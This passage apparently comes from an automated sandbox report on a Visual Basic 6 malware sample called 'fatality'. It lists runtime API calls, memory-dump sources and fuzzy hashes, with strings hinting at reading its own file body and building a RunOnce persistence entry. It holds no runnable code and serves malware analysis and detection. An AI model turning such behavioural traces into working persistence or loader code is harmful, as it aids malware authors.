                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                            • String ID: `%@
                                                                                                                                                            • API String ID: 653519621-700023621
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2204187013-0
                                                                                                                                                            • Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
                                                                                                                                                            • Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,6CEE285F,6CED1654), ref: 00416207
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                            • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                            • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2170920009-0
                                                                                                                                                            • Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
                                                                                                                                                            • Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                            • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2502233557-0
                                                                                                                                                            • Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
                                                                                                                                                            • Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68
                                                                                                                                                            APIs
                                                                                                                                                            • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                            • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                            • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                            • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                            • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$#712Move$CopyFree
                                                                                                                                                            • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                            • API String ID: 2546659950-1311169778
                                                                                                                                                            • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                                                                            • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID: (%@
                                                                                                                                                            • API String ID: 3031735744-1462787901
                                                                                                                                                            • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                            • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                            • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 43011225-0
                                                                                                                                                            • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                            • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 669208520-0
                                                                                                                                                            • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                            • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00418FE9
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419003
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,-00000001), ref: 0041907B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 004190A4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004190D1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004190E1
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 0041913F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                            • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
